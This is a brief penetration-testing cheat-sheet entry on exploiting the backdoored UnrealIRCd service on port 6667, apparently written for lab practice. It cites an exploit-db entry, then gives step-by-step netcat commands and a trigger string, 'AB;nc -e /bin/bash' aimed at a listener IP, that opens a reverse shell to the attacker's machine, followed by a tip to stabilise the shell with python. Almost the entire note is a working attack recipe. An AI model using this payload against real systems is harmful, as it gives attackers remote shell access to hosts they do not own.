Unreal IRC 6667

#Searchsploit has a number of modules https://www.exploit-db.com/exploits/13853 Alternative: Target: 10.10.10.10 Kali: 11.11.11.11 [1a]Connect to vulnerable port using netcat sudo nc 10.10.10.10 6667 [1b] Start nc listener on kali port 4444 [2]From within nc connection, fire off this string to connect back to kali AB;nc -e /bin/bash 11.11.11.1 4444 [3]Get a reverse shell on port 4444, stabilize with python

Last updated